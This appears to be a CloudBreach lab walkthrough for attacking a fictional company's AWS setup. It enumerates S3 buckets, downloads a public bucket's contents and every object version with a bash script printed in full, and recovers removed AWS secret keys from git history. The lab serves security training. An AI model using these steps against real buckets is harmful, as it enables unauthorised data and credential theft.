Enumerate the TwoCapital AWS infrastructure and find the exposed S3 public bucket. Navigate to Tools folder then go to cloud_enum and execute the following command:
cd Desktop/Tools/cloud_enum
./cloud_enum.py -k twocapital --disable-azure --disable-gcp
Output:
Great results! We discovered a few S3 buckets to check out. AWS S3 services are always interesting as they often leak sensitive data. Navigating to the S3 bucket we receive the following result.
Please note, in order to be able to retrieve s3 bucket objects, you will need either to register for a free AWS account (https://portal.aws.amazon.com/billing/signup) and create a pair of valid IAM keys (https://console.aws.amazon.com/iam/) or to use the awscli command using the “–no-sign-request” parameter.
For the purpose of this lab, we will use the “–no-sign-request” parameter.
mkdir s3
cd s3
aws s3 sync s3://twocapitalsource . # This is the command where you need to have AWS credentials.
aws s3 sync s3://twocapitalsource . --no-sign-request # No sign-in required
NOTE: If you encounter a ‘NoSuchBucket’ error during the enumeration of an S3 bucket, it may indicate that the default S3 bucket throttling limit has been reached. In such cases, the specific bucket may appear non-existent, a scenario commonly encountered in real-world engagements. To manage and list objects in the S3 bucket under these circumstances, consider using the ‘s3api’ command instead of ‘s3.’ The ‘s3api’ command can be found on the next three pages.
Output:
Two files and the .git/ folder has been retrieved. The .git directory may encompass sensitive data, such as API keys, developer commit comments, AWS credentials, and even administrative system passwords, along with comprehensive log details.
The tomasnotes file disclosed some useful information regarding an EBS snapshot.
cat tomasnotes
Output:
You can also try the following commands to move or copy objects from s3 bucket to local machine:
aws s3 mv s3://[bucketname]/test-object localfile --no-sign-request
aws s3 cp s3://[bucketname]/test-object localfile --no-sign-request
The next step is to navigate into the .git folder and investigate the contents of the repository.
cd .git
git log
Output:
Looking through the files, nothing interesting seems to be found. The “twocapitalsource” allows anyone to perform the s3:ListBucketVersions action. Let’s check the objects’ versions.
aws s3api list-object-versions --bucket twocapitalsource --no-sign-request
Output:
As we can see from the output of the command above, “tomasnotes” object has multiple versions (IsLatest = false). Our goal is to dump all the different versions in the hope of finding previously committed sensitive info.
Use the following s3BucketVersionDump bash script to list and download all objects hosted in the “twocapitalsource” bucket. It should be noted that objects have different versions.
cd /home/cb0004/Desktop/Tools/CloudBreach_AWSScripts
chmod +x s3BucketVersionDumper.sh
./s3BucketVersionDumper.sh
You can find the script under your Tools folder and in CloudBreach GitHub Repository: https://github.com/cloudbreach/AWSScripts . In addition, you can watch the YouTube video https://www.youtube.com/watch?v=9oeN6jd2um8 demonstrating these steps.
#!/bin/bash
cat << "EOF"
_____ _ _______ _ _
/ __ | | | ___ | | (_)
| / / | ___ _ _ __| | |_/ /_ __ ___ __ _ ___| |__ _ ___
| | | |/ _ | | | |/ _` | ___ '__/ _ / _` |/ __| '_ | |/ _
| __/ | (_) | |_| | (_| | |_/ / | | __/ (_| | (__| | | |_| | (_) |
____/_|___/ __,_|__,_____/|_| ___|__,_|___|_| |_(_)_|___/
AWS Script that list and save all object versions from a specific public S3 bucket.
EOF
# Prompt the user to enter the S3 bucket name
read -p "Enter the S3 bucket name: " BUCKET_NAME
# Prompt the user to enter the local directory path
read -p "Enter the local dir path where the data will be saved. e.g /home/user/Desktop/s3bucket/ : " LOCAL
echo " "
echo " "
echo " "
# List all object versions in the S3 bucket
object_versions=$(aws s3api list-object-versions --bucket "$BUCKET_NAME" --no-sign-request | jq -c '.Versions[]')
# Loop through each object version and download it
while IFS= read -r object_version; do
echo "$object_version"
key=$(echo "$object_version" | jq -r '.Key')
version_id=$(echo "$object_version" | jq -r '.VersionId')
if [ -n "$key" ] && [ "$key" != "null" ] && [ "$version_id" != "null" ]; then
# Create the local directory if it doesn't exist
LOCAL_DIR="$LOCAL$key"
echo $LOCAL_DIR
mkdir -p "$(dirname "$LOCAL_DIR")"
aws s3api get-object --bucket "$BUCKET_NAME" --no-sign-request --key "$key" --version-id "$version_id" "$LOCAL_DIR"
fi
done <<< "$object_versions"
After extracting all items, then we should check the git log on the new dumped files.
cd s3bucket
cd .git
git log
Git log shows a message from tomas. A hint about AWS secrets removed from an earlier version of the file. To retrieve those credentials, we will have to checkout the “52ac2a10867771ab187af4778f14a54d612b3747” commit.
cd ..
git checkout 52ac2a10867771ab187af4778f14a54d612b3747
ls
cat tomassecretkeys
Output:
Great! Access Key and Secret found.